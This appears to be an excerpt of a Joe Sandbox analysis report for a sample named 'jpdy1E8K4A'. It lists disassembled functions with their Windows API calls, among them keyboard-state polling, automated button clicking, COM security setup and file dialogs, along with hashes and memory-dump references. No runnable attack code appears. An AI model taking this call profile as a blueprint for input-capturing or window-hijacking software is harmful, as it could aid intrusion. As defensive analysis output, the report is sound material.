                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                • API String ID: 2295938435-8599901
                                                                                                • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • timeGetTime.WINMM ref: 00443B67
                                                                                                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                • IsWindow.USER32(?), ref: 00443C3A
                                                                                                • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                • String ID: BUTTON
                                                                                                • API String ID: 1834419854-3405671355
                                                                                                • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • _wprintf.LIBCMT ref: 00454074
                                                                                                • __swprintf.LIBCMT ref: 004540A3
                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                • API String ID: 455036304-4153970271
                                                                                                • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                • _memmove.LIBCMT ref: 00467EB8
                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                • _memmove.LIBCMT ref: 00467F6C
                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2170234536-0
                                                                                                • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: State$Async$Keyboard
                                                                                                • String ID:
                                                                                                • API String ID: 541375521-0
                                                                                                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                • String ID:
                                                                                                • API String ID: 3096461208-0
                                                                                                • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3218148540-0
                                                                                                • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                • String ID:
                                                                                                • API String ID: 136442275-0
                                                                                                • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _wcsncpy.LIBCMT ref: 00467490
                                                                                                • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                • _wcstok.LIBCMT ref: 004674FF
                                                                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                • _wcstok.LIBCMT ref: 004675B2
                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                • _wcslen.LIBCMT ref: 00467793
                                                                                                • _wcscpy.LIBCMT ref: 00467641
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • _wcslen.LIBCMT ref: 004677BD
                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                • String ID: X
                                                                                                • API String ID: 3104067586-3081909835
                                                                                                • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                Strings
                                                                                                • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                • String ID: NULL Pointer assignment
                                                                                                • API String ID: 440038798-2785691316
                                                                                                • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                • _wcslen.LIBCMT ref: 004610A3
                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                • String ID: ThumbnailClass
                                                                                                • API String ID: 4136854206-1241985126
                                                                                                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
